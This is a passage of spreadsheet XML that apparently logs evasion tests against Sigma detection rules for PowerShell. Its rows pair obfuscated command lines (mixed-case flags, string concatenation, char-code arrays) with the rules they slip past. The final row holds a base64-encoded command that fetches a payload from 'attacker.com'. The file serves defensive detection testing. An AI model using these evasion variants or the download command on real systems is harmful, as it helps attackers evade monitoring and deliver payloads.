      </c>
      <c r="I785" s="43" t="n"/>
      <c r="J785" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K785" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="786" ht="15.75" customHeight="1" s="42">
      <c r="A786" s="43" t="n"/>
      <c r="B786" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C786" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D786" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E786" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H786" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I786" s="43" t="n"/>
      <c r="J786" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K786" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="787" ht="15.75" customHeight="1" s="42">
      <c r="A787" s="43" t="n"/>
      <c r="B787" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C787" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D787" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E787" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H787" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I787" s="43" t="n"/>
      <c r="J787" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K787" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="788" ht="15.75" customHeight="1" s="42">
      <c r="A788" s="43" t="n"/>
      <c r="B788" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C788" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D788" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E788" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F788" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G788" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H788" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I788" s="43" t="n"/>
      <c r="J788" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K788" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="789" ht="15.75" customHeight="1" s="42">
      <c r="A789" s="43" t="n"/>
      <c r="B789" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C789" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D789" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E789" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F789" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G789" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H789" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I789" s="36" t="n"/>
      <c r="J789" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K789" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="790" ht="15.75" customHeight="1" s="42">
      <c r="A790" s="43" t="n"/>
      <c r="B790" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C790" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D790" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E790" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -commAnD "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F790" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G790" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H790" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I790" s="43" t="n"/>
      <c r="J790" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K790" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="791" ht="15.75" customHeight="1" s="42">
      <c r="A791" s="43" t="n"/>
      <c r="B791" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C791" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D791" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E791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791" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G791" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H791" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I791" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J791" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K791" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="15.75" customHeight="1" s="42">
      <c r="A792" s="43" t="n"/>
      <c r="B792" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C792" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D792" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E792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792" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G792" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H792" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I792" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J792" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K792" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="15.75" customHeight="1" s="42">
      <c r="A793" s="43" t="n"/>
      <c r="B793" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C793" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D793" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E793" s="36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F793" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G793" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H793" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I793" s="36" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J793" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K793" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="794" ht="15.75" customHeight="1" s="42">
      <c r="A794" s="43" t="n"/>
      <c r="B794" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C794" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D794" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E794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794" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G794" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H794" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I794" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J794" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K794" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="795" ht="15.75" customHeight="1" s="42">
      <c r="A795" s="43" t="n"/>
      <c r="B795" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C795" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D795" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E795" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F795" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G795" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H795" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I795" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J795" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K795" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="796" ht="15.75" customHeight="1" s="42">
      <c r="A796" s="43" t="n"/>
      <c r="B796" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C796" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D796" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E796" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F796" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G796" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H796" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I796" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J796" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K796" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="797" ht="15.75" customHeight="1" s="42">
      <c r="A797" s="43" t="n"/>
      <c r="B797" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C797" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D797" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E797" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommanD "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F797" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G797" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H797" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I797" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J797" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K797" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="798" ht="15.75" customHeight="1" s="42">
      <c r="A798" s="43" t="n"/>
      <c r="B798" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C798" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D798" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E798" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F798" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G798" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H798" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I798" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J798" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K798" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="799" ht="15.75" customHeight="1" s="42">
      <c r="A799" s="43" t="n"/>
      <c r="B799" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C799" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D799" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E799" s="36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799" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G799" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H799" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I799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799" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K799" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="800" ht="15.75" customHeight="1" s="42">
      <c r="A800" s="43" t="n"/>
      <c r="B800" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C800" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D800" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E800" s="36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800" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G800" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H800" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I800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800" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K800" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="801" ht="15.75" customHeight="1" s="42">
      <c r="A801" s="43" t="n"/>
      <c r="B801" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C801" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D801" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E801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801" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G801" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H801" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I801" s="36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801" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K801" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="802" ht="15.75" customHeight="1" s="42">
      <c r="A802" s="43" t="n"/>
      <c r="B802" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C802" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D802" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E802" s="36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802" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G802" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H802" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I802" s="36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802" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K802" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="803" ht="15.75" customHeight="1" s="42">
      <c r="A803" s="43" t="n"/>
      <c r="B803" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C803" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D803" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E803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803" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G803" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H803" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I803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803" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K803" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="804" ht="15.75" customHeight="1" s="42">
      <c r="A804" s="43" t="n"/>
      <c r="B804" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C804" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D804" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E804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804" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G804" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H804" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I804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804" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K804" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="805" ht="15.75" customHeight="1" s="42">
      <c r="A805" s="43" t="n"/>
      <c r="B805" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C805" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D805" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E805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805" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G805" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H805" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I805" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J805" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K805" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="806" ht="15.75" customHeight="1" s="42">
      <c r="A806" s="43" t="n"/>
      <c r="B806" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C806" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D806" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E806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806" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G806" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H806" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I806" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J806" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K806" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="807" ht="15.75" customHeight="1" s="42">
      <c r="A807" s="43" t="n"/>
      <c r="B807" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C807" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D807" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E807" s="36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F807" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G807" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H807" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I807" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J807" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K807" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="808" ht="15.75" customHeight="1" s="42">
      <c r="A808" s="43" t="n"/>
      <c r="B808" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C808" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D808" s="36" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E808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808" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G808" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H808" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I808" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J808" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K808" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="809" ht="15.75" customHeight="1" s="42">
      <c r="A809" s="43" t="n"/>
      <c r="B809" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C809" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D809" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E809" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F809" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G809" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H809" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I809" s="43" t="n"/>
      <c r="J809" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K809" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="810" ht="15.75" customHeight="1" s="42">
      <c r="A810" s="43" t="n"/>
      <c r="B810" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C810" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D810" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E810" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F810" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G810" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H810" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I810" s="43" t="n"/>
      <c r="J810" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K810" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="811" ht="15.75" customHeight="1" s="42">
      <c r="A811" s="43" t="n"/>
      <c r="B811" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C811" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D811" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E811" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F811" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G811" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H811" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I811" s="43" t="n"/>
      <c r="J811" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K811" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="812" ht="15.75" customHeight="1" s="42">
      <c r="A812" s="43" t="n"/>
      <c r="B812" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C812" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D812" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E812" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMMaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F812" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G812" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H812" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I812" s="43" t="n"/>
      <c r="J812" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K812" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="813" ht="15.75" customHeight="1" s="42">
      <c r="A813" s="43" t="n"/>
      <c r="B813" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C813" s="36" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D813" s="36" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E813" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -coMmanD "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F813" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G813" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H813" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I813" s="36" t="n"/>
      <c r="J813" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K813" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="814" ht="15.75" customHeight="1" s="42">
      <c r="A814" s="43" t="n"/>
      <c r="B814" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C814" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D814" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E814" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
